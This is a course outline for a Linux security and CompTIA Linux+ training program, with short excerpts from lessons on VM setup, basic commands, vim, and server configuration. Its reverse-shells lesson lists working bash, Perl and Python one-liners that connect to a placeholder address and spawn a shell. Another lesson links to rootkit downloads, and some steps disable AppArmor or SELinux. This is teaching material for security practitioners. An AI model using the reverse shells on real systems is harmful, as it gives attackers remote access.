Linux For InfoSec & Comptia Linux+ Exam Prep

COURSE DETAILS

The Linux for InfoSec Professionals course is a “Zero to Hero” style of training program designed to take someone with little to no Linux experience up to a highly competent Linux practitioner. It will not only teach you the security concepts and guidelines that will keep your Linux servers safe, it will walk you through hardening measures step-by-step.

This course also serves as a great prep guide for the Comptia Linux+ certification.

The CompTIA Linux+ certification covers common tasks in the major Linux distributions, including the Linux command line, basic maintenance, installing and configuring workstations, and networking. Linux+ consists of two exams – LX0-103 and LX0-104. Candidates must pass LX0-103 before taking LX0-104.

Unlike Security+ and Network+, you never have to renew the Linux+ certification. This accreditation is good for life. There are no Continuing Education (CE) requirements.

Course By

Joseph McCray

Lessons

C1L1: Getting Familiar with VMWare

Free Preview

Author: Joseph McCray

For this workshop, the required prerequisite is the latest version of VMWare Workstation (Windows/Linux), Fusion (Mac), or Workstation Player (Windows/Linux). A 30-day trial of Workstation 12.1.1 can be downloaded from here: http://www.vmware.com/products/workstation/workstation-evaluation A 30-day trial of Fusion 8 can be downloaded from here: https://www.vmware.com/products/fusion/fusion-evaluation.html The newest version of VMWare Workstation Player 12.1.1 can be [...]

C1L3: Installing VMware Workstation Player

Author: Joseph McCray

INSTALLING VMWARE WORKSTATION PLAYER First download the player from the following link: https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0 We are going to download the Windows version. The filename will default to the correct…

C1L4: Download the InfoSec Addicts Virtual Machine

Author: Joseph McCray

You can go to the following link and download and create your own virtual machine. https://s3.amazonaws.com/infosecaddicts-vms/Ubuntu-17-10-InfoSecAddictsVM.zip username: infosecaddicts password: infosecaddicts https://s3.amazonaws.com/infosecaddicts-vms/Win7x64.zip username: workshop username: password If not yet downloaded you…

C1L6: Download and install the attack VM

Author: Joseph McCray

You can go to the following link and download and create your own virtual machine. https://s3.amazonaws.com/infosecaddicts-vms/Ubuntu-17-10-InfoSecAddictsVM.zip username: infosecaddicts password: infosecaddicts https://s3.amazonaws.com/infosecaddicts-vms/Win7x64.zip username: workshop username: password Extract the contained directory to…

C1L8: Installing open-vm-tools

Author: Joseph McCray

As we are working on a Linux variant (Ubuntu) that supports open-vm-tools via the repository, we can ignore the VMware warning to update the tools. Once installed they will be kept up-to-date…

C2L1: Basic Linux Commands

Author: Joseph McCray

Let’s get started with some basic Linux commands. These commands provide a wealth of information to the pentester allowing them to successfully navigate and exploit the target system. To open…

C2L2: The power of ls

Author: Joseph McCray

THE POWER OF LS COMMAND The ls command is probably the most commonly used command and can provide lots of useful information. The ls (list) command lists information about the file(s) within a directory.…

C2L3: How to find stuff in Linux

Author: Joseph McCray

You’ll often find yourself looking for things. Here are some useful tips for just that. There are some commands that have proven useful for finding things in Linux. find is a…

C2L4: What is Vim?

Author: Joseph McCray

Vim is a text editor available in most Unix systems. It is an acronym for Vi Improved. Vim was originally developed by Bram Moolenaar as a clone of Bill Joy’s vi editor…

C2L5: Getting Started

Author: Joseph McCray

First off, vim has a fairly extensive man page accessible with the following command: man vim – view the manual page for vim To begin with launch vim from a command…

C2L6: Modes within vim

Author: Joseph McCray

Command mode – The default mode when you launch vim or open a file in it. This mode allows you to navigate around the file in a manner which does not…

C2L7: Basic Keyboard Commands

Author: Joseph McCray

BASIC KEYBOARD COMMANDS All of these commands must be entered via Last Line mode, as such they will be preceded by the colon ‘ : ‘ character when listed below. All text…

C3L1: Basic Shell Scripting

Author: Joseph McCray

BASIC SHELL SCRIPTING A Bash script is a plain text file that contains a series of commands. These commands are a mixture of commands we would normally type ourselves on…

C5L3: Preliminary Information

Author: Joseph McCray

We are using a domain of tps-ubuntu1604.example.com on IP address 192.168.10.139 with a Gateway address of 192.168.10.2. Be sure to change these to something more appropriate with your local environment. We have installed and are…

C5L5: Changing the default Shell

Author: Joseph McCray

By default, the shell is set to /bin/dash. This will cause issues with later tools such as ISPConfig, so we need to change it to /bin/bash. sudo dpkg-reconfigure dash – Answer No. We can verify…

C5L6: Disable AppArmor

Author: Joseph McCray

AppArmor is a SELinux extension meant to provide a stronger method of securing your server. To install ISPConfig, which we do later in this tutorial, we need to disable AppArmor.

C5L10: MariaDB – Manual Configurations

Author: Joseph McCray

We want MySQL to listen on all the interfaces, not just the localhost. Edit /etc/mysql/mariadb.conf.d/50-server.cnf and comment out the line bind-address = 127.0.0.1: sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf Now we secure our…

C5L13: PHP Opcode cache

Author: Joseph McCray

A free PHP opcode cache, for caching as well as optimizing PHP intermediate code, is strongly recommended to speed up your PHP pages. One such option is APCu. sudo apt -y…

C5L14: PHP-FPM

Author: Joseph McCray

To use PHP-FPM with Apache, we need to install the mod_fastcgi Apache module. NOTE: This is not the same as mod_fcgid. sudo apt -y install libapache2-mod-fastcgi php7.0-fpm Enable the module…

C5L15: Additional PHP Versions

Author: Joseph McCray

It is possible to have multiple PHP versions on one server (selectable through ISPConfig), but this will not be covered in this section. For more info on this, visit: https://www.howtoforge.com/how-to-use-multiple-php-versions-php-fpm-and-fastcgi-with-ispconfig-3-ubuntu-12.10

C5L16: Installing Let’s Encrypt

Author: Joseph McCray

ISPConfig 3.1 is provided with built-in support for the free SSL certificate authority Let’s Encrypt, allowing us to create free SSL certificates for use on our website(s). First, we…

C5L17: Install Mailman

Author: Joseph McCray

ISPConfig allows us to manage Mailman mailing lists. To make use of this feature, we need to install Mailman. sudo apt -y install mailman Select at least one language and…

C5L18: Install PureFTPd and Quota

Author: Joseph McCray

PureFTPd and Quota can be installed together with the following command: sudo apt -y install pure-ftpd-common pure-ftpd-mysql quota quotatool Configure PureFTPd by editing /etc/default/pure-ftpd-common sudo vim /etc/default/pure-ftpd-common Set the start mode…

C5L21: Installing Jailkit

Author: Joseph McCray

Jailkit is only necessary if you need to chroot SSH users into their own/specific directories. It is a set of utilities used to limit user accounts to specific files using…

C5L22: Installing fail2ban and UFW

Author: Joseph McCray

While these are optional, it is recommended to install them, as the ISPConfig monitor will attempt to log their results. Fail2ban is an Intrusion Detection System (IDS) that monitors for…

C5L24: Installing ISPConfig 3

Author: Joseph McCray

Install the latest version of ISPConfig3 as follows: cd /tmp sudo wget -O ispconfig.tar.gz https://git.ispconfig.org/ispconfig/ispconfig3/rep… NOTE: The above is one complete command line sudo tar xfz ispconfig.tar.gz cd ispconfig3-master-e1ceb050e19c7574bca146a8da7047ee4ff456b5 cd install…

C5L25: Install SSHFS

Author: Joseph McCray

Frequently it becomes advantageous to work on and edit files from your VM (especially cloud-based instances) from your local machine. Perhaps you have a favorite IDE that is not available…

C5L26: Installing SSHFS on Ubuntu

Author: Joseph McCray

Install SSHFS: sudo apt-get install sshfs Mounting the Remote File System Create a local directory to mount the remote share, replacing “mount point” with something meaningful to your environment. If…

C5L27: Install Samba

Author: Joseph McCray

Reference: http://www.krizna.com/ubuntu/setup-file-server-ubuntu-14-04-samba/ How to install Samba on Ubuntu sudo apt-get update sudo apt-get remove samba sudo apt-get install samba mkdir /home/infosecaddicts/samba sudo nano /etc/samba/smb.conf Then press Ctrl-O to save and…

C5L31: Making SSH Aware of MFA

Author: Joseph McCray

Look for PasswordAuthentication, uncomment it and change the “yes” to “no.” Add the following line underneath UsePam yes AuthenticationMethods publickey,keyboard-interactive Save and exit. Now edit the PAM sshd configuration file. sudo vim…

C5L32: Install Mod_Security

Author: Joseph McCray

What is Mod_Security? According to their website, “ModSecurity is another toolkit for monitoring real-time web applications, logging, and access control. It’s also an enabler: there are no hard rules telling you what to…

C5L33: Configuring Mod_Security Rules

Author: Joseph McCray

Create the configuration file with: sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf Then edit the file with: sudo vim /etc/modsecurity/modsecurity.conf Activate the rules by editing and setting the ‘SecRuleEngine’ option to on: Ensure…

C6L2: Preliminary Information

Author: Joseph McCray

CentOS is a cloned version of the commercial Red Hat Linux distribution. This differs from the Ubuntu server, which is a Debian-derived distribution. For this installation…

C6L4: Disable SELinux

Author: Joseph McCray

SELinux is a security extension that is intended to provide additional security to the system. This will be disabled because we are installing ISPConfig later on. Let’s edit the /etc/selinux/config…

C6L6: Quota

Author: Joseph McCray

Disk quotas are used to alert a system admin when too much disk space is being used or when a partition becomes full. Individual Users and User groups can have…

C6L8: Enabling quota on a separate /var partition

Author: Joseph McCray

If you have a separate /var partition, please refer to  https://www.howtoforge.com/tutorial/perfect-server-centos-7-2-apache-mysql-php-pureftpd-postfix-dovecot-and-ispconfig/ vi /etc/fstab _______________________________________________________________________________________________ # # /etc/fstab # Created by anaconda on Sun Sep 21 16:33:45 2014 # # Accessible filesystems,…

C6L10: Install Dovecot

Author: Joseph McCray

Dovecot is an open source IMAP and POP3 server for Linux. It is a lightweight, fast, and easy-to-set-up mail server developed with security in mind. https://wiki.archlinux.org/index.php/dovecot To install Dovecot, use…

C6L12: Install Postfix

Author: Joseph McCray

Postfix is an open source mail transfer agent (MTA). This software is free under the IBM Public License 1.0. To install Postfix, use the following commands. yum -y install postfix…

C6L13: Install GetMail

Author: Joseph McCray

GetMail is a mail retrieval agent implemented in Python. It is free software licensed under the GNU General Public License v2. Simply install Getmail as follows. yum -y install…

C6L17: Installation of mod_python

Author: Joseph McCray

mod_python will need to be compiled from source code to run. mod_python is an Apache module that embeds the Python interpreter in Apache, allowing the Apache server to execute Python.…

C6L18: Install PureFTPD

Author: Joseph McCray

PureFTPD is a free secure file transfer tool for Unix/Linux based systems. Let’s install the tool, then start it: yum -y install pure-ftpd systemctl enable pure-ftpd.service systemctl start pure-ftpd.service…

C11L1: Security Concepts – AppArmor

Author: Joseph McCray

What is AppArmor? Reference(s): http://askubuntu.com/questions/236381/what-is-apparmor https://wiki.ubuntu.com/AppArmor https://help.ubuntu.com/community/AppArmor AppArmor is a kernel security module for Linux that enforces Mandatory Access Control (MAC). This application allows a system administrator to restrict program…

C12L1: Security Concepts – Log Analysis

Author: Joseph McCray

Security Concepts – Log Analysis Linux log basics Reference(s): http://www.thegeekstuff.com/2011/08/linux-var-log-files/ https://help.ubuntu.com/community/LinuxLogFiles Linux log files are usually stored in the /var/log directory of the file system. These logs contain a wealth…

C14L6: Security Concepts – Reverse Shells

Author: Joseph McCray

Reverse Shells Bash bash -i >& /dev/tcp/$IP-ADDRESS/8080 0>&1 PERL perl -e 'use Socket;$i="$IP-ADDRESS";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Python Tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP-ADDRESS",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP php -r…

C14L7: Security Concepts – Tunneling

Author: Joseph McCray

Tunneling ICMP Tunneling: http://null-byte.wonderhowto.com/how-to/hack-like-pro-create-nearly-undetectable-covert-channel-with-tunnelshell-0155704/ http://log.lain.li/blog/setting-up-ip-over-icmp-with-hans/ DNS Tunneling: http://resources.infosecinstitute.com/dns-tunnelling/ https://zeltser.com/c2-dns-tunneling/ SSH Tunneling: http://u-tips-n-tricks.blogspot.com/2012/12/ssh-tunnel.html http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html http://www.linuxjournal.com/content/ssh-tunneling-poor-techies-vpn STunnel: https://www.digitalocean.com/community/tutorials/how-to-set-up-an-ssl-tunnel-using-stunnel-on-ubuntu Reverse SSH Tunneling: https://www.howtoforge.com/reverse-ssh-tunneling

C14L9: Security Concepts – Post Exploitation – Finding backdoors and rootkits

Author: Joseph McCray

Finding backdoors https://www.rawhex.com/2016/03/a-guide-to-recognising-backdoors-using-metasploitable-2/ Rootkits https://packetstormsecurity.com/files/125240/Azazel-Userland-Rootkit.html https://packetstormsecurity.com/files/118317/Linux-2.6-Kernel-proc-Rootkit-Backdoor.html https://packetstormsecurity.com/files/110942/Jynx-Kit-Release-2.html https://packetstormsecurity.com/files/108286/KBeast-Kernel-Beast-Linux-Rootkit-2012.html